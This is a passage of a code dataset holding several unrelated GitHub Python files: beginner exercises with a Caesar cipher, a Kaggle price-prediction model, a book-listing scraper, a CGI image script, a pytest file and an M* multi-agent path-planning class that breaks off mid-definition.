protein_goal=protein_goal,\n fat_goal=fat_goal,\n carb_goal=carb_goal \n )\n\n db.session.add(calculator_info)\n db.session.commit()\n\n return calculator_info \n\ndef user_exercises(exercise, user_id):\n \n \"\"\"track exercise \"\"\"\n\n exercise_info = Exercise(\n exercise=exercise, \n user_id=user_id\n )\n\n \n db.session.add(exercise_info)\n db.session.commit()\n\n return exercise_info \n\nif __name__ == '__main__':\n from server import app\n \n connect_to_db(app)\n ","repo_name":"devvynl/meals-macros-project","sub_path":"crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24873640406","text":"import base64\nimport cv2\nimport socket\nimport json\n\n\ndef log_sender(message: dict, port=9010):\n \"\"\"\n ポート9010番にjson形式でメッセージを送信する\n \"\"\"\n\n message[\"image\"] = _cv_to_base64(message[\"image\"])\n\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect((\"localhost\", port))\n\n message_json = json.dumps(message)\n\n client.send(message_json.encode(\"utf-8\"))\n\n client.close()\n\n\ndef _cv_to_base64(img):\n _, encoded = cv2.imencode(\".jpg\", img)\n return base64.b64decode(encoded).decode(\"ascii\")\n","repo_name":"HaoriHakama/ImageLogger","sub_path":"image_receiver/log_sender.py","file_name":"log_sender.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71871876319","text":"# Review: \r\n# Create a function called greet(). \r\ndef greet():\r\n# Write 3 print statements inside the function.\r\n print(\"Hello...\")\r\n print(\"How are you?\")\r\n print(\"Are you being the best version of you?\")\r\n# Call the greet() function and run your code.\r\ngreet()\r\n\r\n# Function that allows for input\r\ndef greet_with_name(name):\r\n print(f\"Hello {name}.....\")\r\n print(f\"How are you {name}?\")\r\n\r\ngreet_with_name(\"Keelen\")\r\n\r\n# Functions with more than 1 input\r\ndef greet_with(name, location):\r\n print(f\"Hello {name}\")\r\n print(f\"{name} I am from {location}, where are you from?\")\r\n\r\ngreet_with(\"Keelen\", \"Houston\")\r\n# Positional Argument, it is important to have the order of the inputs corresponding to the parameters within the function.\r\n\r\n# -------------------------------------------------------------------------------------------------------------------------\r\n\r\n# You are painting a wall. The instructions on the paint can says that 1 can of paint can cover 5 square meters of wall. Given a random height and width of wall, calculate how many cans of paint you'll need to buy.\r\nimport math\r\n\r\ndef paint_calc(height, width, cover):\r\n multi = height * width\r\n calculated = multi / cover\r\n final_cal = math.ceil(calculated)\r\n print(f\"You'll need {final_cal} cans of paint.\")\r\n\r\n\r\ntest_h = int(input(\"Height of wall: \"))\r\ntest_w = int(input(\"Width of wall: \"))\r\ncoverage = 5\r\npaint_calc(height=test_h, width=test_w, cover=coverage)\r\n\r\n# -------------------------------------------------------------------------------------------------------------------------\r\n\r\n# You need to write a function that checks whether if the number passed into it is a prime number or not.\r\n\r\n# e.g. 2 is a prime number because it's only divisible by 1 and 2.\r\n\r\n# But 4 is not a prime number because you can divide it by 1, 2 or 4.\r\n\r\n\r\ndef prime_checker(number):\r\n is_prime = True\r\n for i in range(2, number):\r\n if number % i == 0:\r\n is_prime = False\r\n if is_prime:\r\n print(\"It's a prime number.\")\r\n else:\r\n print(\"It's not a prime number.\")\r\n\r\nn = int(input(\"Check this number: \"))\r\nprime_checker(number=n)\r\n\r\n #-------------------------------------------------------------------------------------------------------------------------\r\n\r\n# Encryption Code Challenge 1\r\n\r\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n\r\ndirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\r\ntext = input(\"Type your message:\\n\").lower()\r\nshift = int(input(\"Type the shift number:\\n\"))\r\n\r\n#TODO-1: Create a function called 'encrypt' that takes the 'text' and 'shift' as inputs.\r\ndef encrypt(plain_text, shift_amount):\r\n cipher_text = \"\"\r\n for letter in plain_text:\r\n position = alphabet.index(letter)\r\n new_position = position + shift_amount\r\n new_letter = alphabet[new_position]\r\n cipher_text += new_letter\r\n print(f\"The encoded text is {cipher_text}\")\r\n #TODO-2: Inside the 'encrypt' function, shift each letter of the 'text' forwards in the alphabet by the shift amount and print the encrypted text. \r\n #e.g. \r\n #plain_text = \"hello\"\r\n #shift = 5\r\n #cipher_text = \"mjqqt\"\r\n #print output: \"The encoded text is mjqqt\"\r\n\r\n ##HINT: How do you get the index of an item in a list:\r\n #https://stackoverflow.com/questions/176918/finding-the-index-of-an-item-in-a-list\r\n\r\n ##🐛Bug alert: What happens if you try to encode the word 'civilization'?🐛\r\n\r\n#TODO-3: Call the encrypt function and pass in the user inputs. You should be able to test the code and encrypt a message.\r\nencrypt(plain_text = text, shift_amount = shift)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------------\r\n\r\n# Encryption Code Challenge 2\r\n\r\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n\r\ndirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\r\ntext = input(\"Type your message:\\n\").lower()\r\nshift = int(input(\"Type the shift number:\\n\"))\r\n\r\ndef encrypt(plain_text, shift_amount):\r\n cipher_text = \"\"\r\n for letter in plain_text:\r\n position = alphabet.index(letter)\r\n new_position = position + shift_amount\r\n cipher_text += alphabet[new_position]\r\n print(f\"The encoded text is {cipher_text}\")\r\n\r\n#TODO-1: Create a different function called 'decrypt' that takes the 'text' and 'shift' as inputs.\r\n\r\ndef decrypt(cypher_text, shift_amount):\r\n plain_text = \"\"\r\n for letter in cypher_text:\r\n position = alphabet.index(letter)\r\n new_position = position - shift_amount\r\n plain_text += alphabet[new_position]\r\n print(f\"The decoded text is {plain_text}\")\r\n \r\n #TODO-2: Inside the 'decrypt' function, shift each letter of the 'text' *backwards* in the alphabet by the shift amount and print the decrypted text. \r\n #e.g. \r\n #cipher_text = \"mjqqt\"\r\n #shift = 5\r\n #plain_text = \"hello\"\r\n #print output: \"The decoded text is hello\"\r\n\r\n\r\n#TODO-3: Check if the user wanted to encrypt or decrypt the message by checking the 'direction' variable. Then call the correct function based on that 'drection' variable. You should be able to test the code to encrypt *AND* decrypt a message.\r\nif direction == \"encode\":\r\n encrypt(plain_text=text, shift_amount=shift)\r\nelif direction == \"decode\":\r\n decrypt(cipher_text = text, shift_amount = shift)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------------\r\n\r\n# Encryption Code Challenge 3\r\n\r\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n\r\ndirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\r\ntext = input(\"Type your message:\\n\").lower()\r\nshift = int(input(\"Type the shift number:\\n\"))\r\n\r\n#TODO-1: Combine the encrypt() and decrypt() functions into a single function called caesar(). \r\ndef caesar(start_text, shift_amount, cipher_direction):\r\n end_text = \"\"\r\n if cipher_direction == \"decode\":\r\n shift_amount *= -1\r\n for letter in start_text:\r\n position = alphabet.index(letter)\r\n new_position = position + shift_amount\r\n end_text += alphabet[new_position]\r\n print(f\"The {cipher_direction}d text is {end_text}\")\r\n\r\n#TODO-2: Call the caesar() function, passing over the 'text', 'shift' and 'direction' values.\r\ncaesar(start_text = text, shift_amount = shift, cipher_direction = direction)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n","repo_name":"Keelen-Fisher/Udemy-Python","sub_path":"Day-8/Day8.py","file_name":"Day8.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23685731028","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom scipy.sparse import csr_matrix, hstack\nimport lightgbm as lgb\nfrom nltk.corpus import stopwords\nimport re\nfrom nltk.stem.porter import PorterStemmer\nimport sys\nsys.path.insert(0, '/wordbatch/')\nimport wordbatch\nfrom wordbatch.models import FTRL, FM_FTRL\nfrom wordbatch.extractors import WordBag, WordHash\n\nnotable = ['bundle', 'new', 'nwt', 'large', 'small', 'sz', 'lot', 'medium', 'xl', 'xs', 'vintage', 'nwot', 'bnwt', ]\nremove = ['for', 'and', 'vs', 'of', 'women', 'men', 'ship', 'the', 'on', 'with',\n 'in', 'one', 'boys', 'shipping', 'toddler', 'by', 'rm', 'piece', 'me', 'kids', 'fit', 'boy', 'mens', 'super',\n 'only', 'all','too', 'color', 'freeship', 'it', 'works', 'like', 'womens', 'to', 'perfect', 'woman', 'youth', 'hello', 'my',\n 'from', 'buy','go', 'is', 'at', 'wear', 'toys', 'children']\n\nstopwords = {x: 1 for x in stopwords.words('english')}\nstopwords2 = ['abcdef'] + [x for x in stopwords]\nnon_alphanums = re.compile(u'[^A-Za-z0-9]+')\n\nstemmer = PorterStemmer()\n\n\ndef rmsle(y, y0):\n assert len(y) == len(y0)\n return np.sqrt(np.mean(np.power(np.log1p(y) - np.log1p(y0), 2)))\n\n\ndef stem_tokens(tokens, stemmer):\n stemmed = []\n\n for item in tokens:\n stemmed_item = item\n try:\n stemmed_item = stemmer.stem(item)\n except Exception:\n print(\"EXCEPTION WHILE STEM\")\n print(stemmed_item)\n pass\n stemmed.append(stemmed_item)\n\n return stemmed\n\n\ndef fill_missing(df, text_cols, num_cols, bin_cols):\n for col in text_cols:\n df[col].fillna(value=\"abcdef\", inplace=True)\n for col in num_cols:\n df[col].fillna(value=df[col].mean(), inplace=True)\n for col in bin_cols:\n df[col].fillna(value=int(df[col].mean()), inplace=True)\n\n\ndef normalize_text(text):\n return u\" \".join([x for x in [y for y in non_alphanums.sub(' ', text).lower().strip().split(\" \")] if len(x) > 1 and x not in stopwords])\n\n\ndef filter_norm1(text):\n tokens = [x for x in [y for y in non_alphanums.sub(' ', text).lower().strip().split(\" \")] if\n len(x) > 1 and x not in stopwords2]\n return \" \".join(stem_tokens(tokens, stemmer))\n\n\ndef split_cat(text):\n try:\n return text.split(\"/\")\n except:\n return [\"Other\", \"Other2\", \"Other3\"]\n\n\nstart_time = time.time()\n\ntrain = pd.read_csv('train.tsv', sep='\\t')\ntest = pd.read_csv('test.tsv', sep='\\t')\nprint('[{}] Finished to load data'.format(time.time() - start_time))\nprint('Train shape: ', train.shape)\nprint('Test shape: ', test.shape)\n\nnrow_test = train.shape[0]\noutliers = train[(train.price < 1.0)]\ntrain = train.drop(train[(train.price < 1.0)].index)\n\ndel outliers['price']\nnrow_train = train.shape[0]\n\ny = np.log1p(train[\"price\"])\nall_data = pd.concat([train, outliers, test])\nsubmission = test[['test_id']]\n\nall_data['general_cat'], all_data['subcat_1'], all_data['subcat_2'] = zip(\n *all_data['category_name'].apply(lambda x: split_cat(x)))\nall_data.drop('category_name', axis=1, inplace=True)\n\ntext_cols = [\"name\", \"general_cat\", \"subcat_1\", \"subcat_2\", \"brand_name\", \"item_description\"]\nnum_cols = [\"item_condition_id\"]\nbin_cols = [\"shipping\"]\ntext_seq_cols = [\"name\", \"item_description\"]\n\nfill_missing(all_data, text_cols, num_cols, bin_cols)\n\nall_data[\"all_text\"] = all_data[\"brand_name\"].astype(str) + \" \" + all_data[\"name\"].astype(str) + \" \" + all_data[\n 'item_description']\nall_data[\"name_brand\"] = all_data[\"brand_name\"].astype(str) + \" \" + all_data[\"name\"].astype(str)\n\nwb = wordbatch.WordBatch(normalize_text, extractor=(WordBag, {\"hash_ngrams\": 1,\n # \"hash_ngrams_weights\": [1.5, 1.0],\n \"hash_size\": 2 ** 29,\n \"norm\": None,\n \"tf\": 'binary',\n \"idf\": None, }), procs=8)\nwb.dictionary_freeze = True\nX_all_text = wb.fit_transform(all_data['all_text'])\ndel (wb)\nX_all_text = X_all_text[:, np.array(np.clip(X_all_text.getnnz(axis=0) - 1, 0, 1), dtype=bool)]\nprint('[{}] Vectorize `all text` completed.'.format(time.time() - start_time))\nprint(X_all_text.shape)\n\nwb = wordbatch.WordBatch(filter_norm1, extractor=(WordBag, {\"hash_ngrams\": 2,\n \"hash_ngrams_weights\": [1.5, 1.0],\n \"hash_size\": 2 ** 29,\n \"norm\": None,\n \"tf\": 'binary',\n \"idf\": None, }), procs=8)\nwb.dictionary_freeze = True\nX_name3 = wb.fit_transform(all_data['name_brand'])\ndel (wb)\nX_name3 = X_name3[:, np.array(np.clip(X_name3.getnnz(axis=0) - 1, 0, 1), dtype=bool)]\nprint('[{}] Vectorize `name 2-gram` completed.'.format(time.time() - start_time))\nprint(X_name3.shape)\n\nwb = CountVectorizer()\nX_category1 = wb.fit_transform(all_data['general_cat'])\nX_category2 = wb.fit_transform(all_data['subcat_1'])\nX_category3 = wb.fit_transform(all_data['subcat_2'])\nprint('[{}] Count vectorize `categories` completed.'.format(time.time() - start_time))\n\nX_dummies = csr_matrix(pd.get_dummies(all_data[['item_condition_id', 'shipping']], sparse=True).values)\nprint('[{}] Get dummies on `item_condition_id` and `shipping` completed.'.format(time.time() - start_time))\n\ndel wb\n\nprint(X_dummies.shape, X_category1.shape, X_category2.shape, X_category3.shape, X_name3.shape, X_all_text.shape)\nsparse_merge = hstack((X_dummies, X_category1, X_category2, X_category3, X_all_text, X_name3)).tocsr() # X_brand\n\nprint('[{}] Create sparse merge completed'.format(time.time() - start_time))\n#\n# Remove features with document frequency <=1\nprint(sparse_merge.shape)\nsparse_merge = sparse_merge[:, np.where(sparse_merge.getnnz(axis=0) > 150)[0]]\nX = sparse_merge[:nrow_train]\nX_test = sparse_merge[nrow_test:]\nprint(sparse_merge.shape)\n\ny = np.log1p(train[\"price\"])\n\nparams = {\n 'learning_rate': 0.65,\n 'application': 'regression',\n 'max_depth': 4,\n 'num_leaves': 31,\n 'verbosity': -1,\n 'metric': 'RMSE',\n 'data_random_seed': 1,\n 'bagging_fraction': 0.8,\n 'bagging_freq': 500,\n 'feature_fraction': 0.8,\n 'nthread': 4,\n 'min_data_in_leaf': 100,\n 'max_bin': 31\n}\n\nd_train = lgb.Dataset(X, label=y)\n\nwatchlist = [d_train]\nmodel = lgb.train(params, train_set=d_train, num_boost_round=5500, valid_sets=watchlist, verbose_eval=500)\n\n\nprint('[{}] Finished training model...'.format(time.time() - start_time))\n\npreds1 = model.predict(X_test)\n\nprint('[{}] Predict LGB completed.'.format(time.time() - start_time))\n\nmodel3 = FM_FTRL(alpha=0.01, beta=0.01, L1=0.00001, L2=0.1, D=sparse_merge.shape[1], alpha_fm=0.01, L2_fm=0.0,\n init_fm=0.01,\n D_fm=200, e_noise=0.0001, iters=17, inv_link=\"identity\", threads=4)\n\nmodel3.fit(X, y)\nprint('[{}] Train FM_FTRL completed'.format(time.time() - start_time))\n\npreds3 = model3.predict(X_test)\n\nfinal_pred = 0.39479745 * preds1 + 0.60691396 * preds3\n\nsubmission['price'] = np.expm1(final_pred)\nsubmission.to_csv(\"submission_2.csv\", index=False)\n\nprint('[{}] Finished training models...'.format(time.time() - start_time))\n","repo_name":"hiflyin/Kaggle-Solutions_in_top_10pc","sub_path":"mercari_top_8pc/MM55.py","file_name":"MM55.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28026888000","text":"import json\n\nimport pytest\nfrom botocore.exceptions import ClientError\nfrom moto.core import patch_resource\n\nfrom badger_api.claimable import get_latest_claimable_snapshot\nfrom helpers.enums import Network, SubgraphUrlType\nfrom rewards.aws.helpers import dynamodb\nfrom tests.utils import chains\nfrom tests.utils import mock_tree\nfrom tests.utils import set_env_vars\n\nset_env_vars()\n\n\ndef mock_download_tree(file_name: str, chain: str):\n return json.dumps(mock_tree)\n\n\n@pytest.fixture(autouse=True)\ndef mock_fns(mocker):\n mocker.patch(\"rewards.classes.TreeManager.download_tree\", mock_download_tree)\n\n\n@pytest.fixture\ndef tree():\n return mock_tree\n\n\n@pytest.fixture\ndef tokens_to_check(tree):\n return list(tree[\"tokenTotals\"].keys())\n\n\n@pytest.mark.parametrize(\"chain\", chains)\ndef test_get_latest_claimable_snapshot(chain, setup_dynamodb, mocker):\n url = f\"https://api.thegraph.com/subgraphs/name/badger-finance/badger-dao-setts-{chain}\"\n if (chain == Network.Ethereum):\n url = \"https://api.thegraph.com/subgraphs/name/badger-finance/badger-dao-setts\"\n mocker.patch(\"subgraph.subgraph_utils.subgraph_url_from_config\",\n return_value={SubgraphUrlType.Plain: url})\n patch_resource(dynamodb)\n cb_snapshot = get_latest_claimable_snapshot(chain)\n assert len(cb_snapshot) > 0\n for cb_data in cb_snapshot:\n assert 'address' in cb_data\n assert 'chain' in cb_data\n assert 'claimableBalances' in cb_data\n\n\ndef raise_client_error(chain, block):\n raise ClientError({}, \"\")\n\n\ndef test_latest_claimable_snapshot_unhappy(setup_dynamodb, mock_discord, mocker):\n patch_resource(dynamodb)\n mocker.patch(\"badger_api.claimable.get_claimable_balances\", side_effect=raise_client_error)\n with pytest.raises(ClientError):\n get_latest_claimable_snapshot(Network.Ethereum)\n # Make sure discord message was sent\n assert mock_discord.called\n # Make sure only one message was sent to discord\n assert mock_discord.call_count == 1\n","repo_name":"Badger-Finance/badger-rewards","sub_path":"tests/test_claimable.py","file_name":"test_claimable.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"41712507829","text":"import requests\nfrom lxml import etree\nfrom fake_useragent import UserAgent\nimport re\nimport csv\nimport urllib\nimport urllib.request\nimport re\nimport os\n\nTYPE = '医学'\nKEY_VALUE = 'ҽѧ'\nCSV_PATH = TYPE +'.csv'\nIMG_PATH = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\图书信息\\\\'+TYPE+'\\\\原图'\nx = 1\ndef get_page(key):\n for page in range(1,20):\n url = 'http://search.dangdang.com/?key=%s&act=input&page_index=%s' % (key,page)\n headers = {\n 'User-Agent':UserAgent().random\n }\n response = requests.get(url = url,headers = headers)\n parse_page(response)\n print('page %s over!!!' % page)\n\ndef parse_page(response):\n tree = etree.HTML(response.text)\n li_list = tree.xpath('//ul[@class=\"bigimg\"]/li')\n # print(len(li_list)) # 测试\n path = IMG_PATH\n if not os.path.isdir(path):\n os.makedirs(path) # 判断没有此路径则创建\n paths = path + '\\\\' # 保存在test路径下\n global x\n flag = 0\n for li in li_list:\n data = []\n try:\n # 获取书的标题,并添加到列表中\n title = li.xpath('./p[@class=\"name\"]/a/@title')[0].strip()\n data.append(title)\n # 获取价格,并添加到列表中\n price = li.xpath('./p[@class=\"price\"]/span[1]/text()')[0]\n pub_price = re.sub('¥','',price).strip()\n data.append(pub_price)\n # 获取作者,并添加到列表中\n author = ''.join(li.xpath('./p[@class=\"search_book_author\"]/span[1]//text()')).strip()\n data.append(author)\n # 获取出版社,并添加到列表中\n press = ''.join(li.xpath('./p[@class=\"search_book_author\"]/span[3]//text()')).strip()\n pub_press = re.sub('/','',press).strip()\n data.append(pub_press)\n # 获取出版时间,并添加到列表中\n time = li.xpath('./p[@class=\"search_book_author\"]/span[2]/text()')[0]\n pub_time = re.sub('/','',time).strip()\n data.append(pub_time)\n # 获取书本的简介,并添加到列表中.由于有些书本没有简介,所以要用try\n commodity_detail = ''\n commodity_detail = li.xpath('./p[@class=\"detail\"]/text()')[0]\n data.append(commodity_detail)\n # 获取书的标题,并添加到列表中\n if(flag != 0):\n imgurl =''.join(li.xpath('./a/img/@data-original'))\n else:\n imgurl =''.join(li.xpath('./a/img/@src'))\n flag = flag + 1\n urllib.request.urlretrieve(imgurl, '{0}{1}.jpg'.format(paths, x)) # 打开imglist,下载图片到本地\n img_path = '' + str(x) + \".jpg\"\n data.append(img_path)\n x = x + 1\n except Exception as e:\n pass\n save_data(data)\n\ndef save_data(data):\n writer.writerow(data)\n\ndef main():\n key = KEY_VALUE # input('Please input key:')\n get_page(key) \nfp = open(CSV_PATH,'w+',encoding = 'utf-8-sig',newline = '')\nwriter = csv.writer(fp)\nheader = ['书名','价格','作者','出版社','出版时间','简介','图片名']\nwriter.writerow(header)\nmain()\nfp.close()","repo_name":"qxpineapple/CrawlerInAndResultHandle","sub_path":"Python/getDoubanBook.py","file_name":"getDoubanBook.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70219551839","text":"import os\nfrom io import BytesIO\nfrom PIL import Image, ImageDraw\nfrom sys import stdin, stdout\n\nif __name__ == '__main__':\n image_data = stdin.buffer.read(int(os.environ['CONTENT_LENGTH']))\n cgi_headers = [\n \"SERVER_SOFTWARE\", \"SERVER_NAME\", \"GATEWAY_INTERFACE\",\n \"SERVER_PROTOCOL\", \"SERVER_PORT\", \"REQUEST_METHOD\",\n \"QUERY_STRING\", \"SCRIPT_NAME\", \"REMOTE_HOST\",\n \"CONTENT_TYPE\", \"CONTENT_LENGTH\"]\n header_output = '\\n'.join([ os.environ[x] for x in cgi_headers ])\n with Image.open(BytesIO(image_data)) as im:\n resized_image = im.resize((800,800))\n draw = ImageDraw.Draw(resized_image)\n draw.multiline_text((10,10), header_output, fill=\"black\")\n resized_image.save(stdout, 'png')","repo_name":"cwgem/python-deployment-protocols","sub_path":"cgi/cgi_application.py","file_name":"cgi_application.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"1619203656","text":"from queue import PriorityQueue\nfrom sklearn.model_selection import ParameterGrid\nimport copy\nimport heapq\nimport time\n\nclass Vertex():\n def __init__(self, v_id):\n assert type(v_id) == tuple\n assert len(v_id) == 2\n\n self.v_id = v_id\n self.collision_set = frozenset()\n self.g = 1e6\n self.f = None\n self.back_set = dict()\n self.back_ptr = None\n self.forward_pointer = None\n \n @property\n def is_standard(self):\n return self.v_id[0] == self.v_id[1]\n \n def add_collision(self, other_collision_set):\n # print(\"other col set: {}\".format(other_collision_set))\n other_col_set2 = []\n # make work with single set or sets of sets:\n for temp in other_collision_set:\n if type(temp) == frozenset:\n other_col_set2.append(temp)\n else:\n other_col_set2.append(other_collision_set)\n break\n #assert len(other_collision_set) > 1\n assert self._check_valid_collision_set() == True\n for other_collision_set in other_col_set2:\n to_merge = []\n keep_same = []\n for i in other_collision_set:\n for existing_set in self.collision_set:\n if i in existing_set:\n if not existing_set in to_merge:\n to_merge.append(existing_set)\n else:\n keep_same.append(existing_set)\n to_merge.append(other_collision_set)\n #remove sets in keep_same which is also in to_marge\n keep_same = [k for k in keep_same if not k in to_merge]\n if len(to_merge) == 0:\n keep_same.append(other_collision_set)\n else:\n big_set = []\n for item in to_merge:\n for i2 in item:\n big_set.append(i2)\n big_set = frozenset(big_set)\n new_col_set = []\n new_col_set.append(big_set)\n for k in keep_same:\n new_col_set.append(k)\n new_col_set = frozenset(new_col_set)\n self.collision_set = new_col_set\n # print(\"Added col set {}\".format(self.collision_set))\n # if len(other_collision_set) == 0:\n # return\n # #assert len(other_collision_set) > 1\n # assert self._check_valid_collision_set() == True\n # to_merge = []\n # keep_same = []\n # for i in other_collision_set:\n # for existing_set in self.collision_set:\n # if i in existing_set:\n # if not existing_set in to_merge:\n # to_merge.append(existing_set)\n # else:\n # keep_same.append(existing_set)\n # to_merge.append(other_collision_set)\n # #remove sets in keep_same which is also in to_marge\n # keep_same = [k for k in keep_same if not k in to_merge]\n # if len(to_merge) == 0:\n # keep_same.append(other_collision_set)\n # else:\n # big_set = []\n # for item in to_merge:\n # for i2 in item:\n # big_set.append(i2)\n # big_set = frozenset(big_set)\n # new_col_set = []\n # new_col_set.append(big_set)\n # for k in keep_same:\n # new_col_set.append(k)\n # new_col_set = frozenset(new_col_set)\n # self.collision_set = new_col_set\n # print(\"new col set: {}\".format(new_col_set))\n\n def _check_valid_collision_set(self):\n temp = dict()\n flag = True\n for item in self.collision_set:\n if type(item) == frozenset:\n for it in item:\n if not it in temp:\n temp[it] = it\n else:\n flag = False\n else:\n raise Exception(\"invalid object type in collision set\")\n return flag\n\n # def is_col_subset(self, other_set):\n # flag = False\n # for sub in self.collision_set:\n # if other_set.issubset(sub):\n # flag = True\n # if len(other_set) == 0:\n # flag = True\n # return flag\n def is_col_subset(self, other_set):\n #make work with set of sets and single set:\n other_set2 = []\n is_sets_of_sets = [True if type(i) == frozenset else False for i in other_set]\n if True in is_sets_of_sets:\n assert all(is_sets_of_sets)\n if False in is_sets_of_sets:\n is_sets_of_sets_cpy = [True if i==False else True for i in is_sets_of_sets]\n assert all(is_sets_of_sets_cpy)\n \n if all(is_sets_of_sets) and len(is_sets_of_sets)!=0:\n for s in other_set:\n other_set2.append(s)\n else:\n other_set2.append(other_set)\n\n col_set_flat = []\n is_sets_of_sets = [True if type(i) == frozenset else False for i in self.collision_set]\n if True in is_sets_of_sets:\n assert all(is_sets_of_sets)\n if False in is_sets_of_sets:\n is_sets_of_sets_cpy = [True if i==False else True for i in is_sets_of_sets]\n assert all(is_sets_of_sets_cpy)\n\n if all(is_sets_of_sets) and len(is_sets_of_sets)!=0:\n for s in self.collision_set:\n col_set_flat.append(s)\n else:\n col_set_flat.append(self.collision_set)\n\n #Check if otherset is subset of collision set\n other_set_dict = {other: False for other in other_set2}\n for k in other_set_dict.keys():\n for sub in col_set_flat:\n if k.issubset(sub):\n other_set_dict[k] = True\n flag = all(list(other_set_dict.values()))\n return flag\n\n\n def add_back_set(self, new_v):\n assert isinstance(new_v, type(self)), \"Input is not a Vertex class\"\n self.back_set[new_v.v_id] = new_v\n \n def get_back_set(self):\n return self.back_set.values()\n \n #For priority que:\n def __eq__(self, other_v):\n return self.g == other_v.g\n def __gt__(self, other_v):\n return self.g > other_v.g\n def __ge__(self, other_v):\n return self.g >= other_v.g\n def __lt__(self, other_v):\n return self.g < other_v.g\n def __le__(self, other_v):\n return self.g <= other_v.g\n\n\nclass SimplePriorityQ():\n def __init__(self):\n self.q = []\n def push(self, item):\n heapq.heappush(self.q, item)\n def pop(self):\n (_, n) = heapq.heappop(self.q)\n return n\n def empty(self):\n if len(self.q) == 0:\n return True\n else:\n return False\n\nclass PriorityQueue2(SimplePriorityQ):\n '''PQ which implements __contains__ member'''\n def __init__(self):\n super().__init__()\n self.lookup_table = {}\n def add_lookup(self, item):\n if item[-1].v_id in self.lookup_table:\n self.lookup_table[item[-1].v_id] += 1\n else:\n self.lookup_table[item[-1].v_id] = 1\n def remove_lookup(self, v):\n if v.v_id in self.lookup_table:\n if self.lookup_table[v.v_id] < 2:\n del self.lookup_table[v.v_id]\n else:\n self.lookup_table[v.v_id] -= 1\n def push(self, item):\n super().push(item)\n self.add_lookup(item)\n def pop(self):\n result = super().pop()\n self.remove_lookup(result)\n return result\n # def get(self):\n # result = super().pop()\n # self.remove_lookup(result)\n # return result\n def __contains__(self, key):\n return key.v_id in self.lookup_table\n\nclass AllVertex():\n '''Keeps track of all nodes created\n such that nodes are created only once '''\n def __init__(self):\n self.all_v = dict()\n #self.intermediate = use_intermediate_nodes\n def get(self, v_id):\n if v_id in self.all_v:\n return self.all_v[v_id]\n else:\n self.all_v[v_id] = Vertex(v_id)\n return self.all_v[v_id]\n \nclass Mstar_ODr():\n def __init__(self, end, expand_position, get_next_joint_policy_position, get_shortest_path_cost, sub_graphs = None, inflation = None):\n '''\n This class implements subdimensional expansion with a star as the search algorithm.\n It assumes the following functions which are external to the class:\n -- expand_position: returns the neighbouring vertices of a single position\n -- get_next_joint_policy_position: Returns the next vertex of a particular agents \n joint policy action\n where the joint policy is the shortest path action\n where there is no other agents.\n -- het_shortest_path_cost = the shortest path cost of single agent.\n -- get_SIC: returns the sum of individual cost (individual \n optimal path cost from vertex vk to vf)\n '''\n if type(end) == list:\n end = tuple(end)\n \n if type(end) == tuple:\n end = {i:v for i,v in enumerate(end)}\n\n assert type(end) == dict\n self.v_len = len(end)\n self.end_dict = end\n self.agent_ids = frozenset(end.keys())\n self.expand_position = expand_position\n self.get_next_joint_policy_position = get_next_joint_policy_position\n self.heuristic_shortest_path_cost = get_shortest_path_cost\n self.all_v = AllVertex()\n\n if inflation is None:\n self.inflation = 1.0\n else:\n self.inflation = inflation\n\n\n if sub_graphs is None:\n self.sub_graphs = dict()\n else:\n self.sub_graphs = sub_graphs\n \n self._init_own_sub_graph()\n\n \n def _init_own_sub_graph(self):\n hldr = list(self.end_dict.keys())\n hldr.sort()\n own_id = tuple(hldr)\n if not own_id in self.sub_graphs:\n self.sub_graphs[own_id] = self.retrieve_next_optimal_pos\n print(\"Creating sub graph: {}\".format(own_id))\n else:\n print(\"_init_own_sub_graph called but id already in sub_graph\")\n\n\n def query_sub_graph_optimal_policy(self, this_graph_sub_id, sub_start_v):\n '''this_graph_sub_id the collision set in this instance 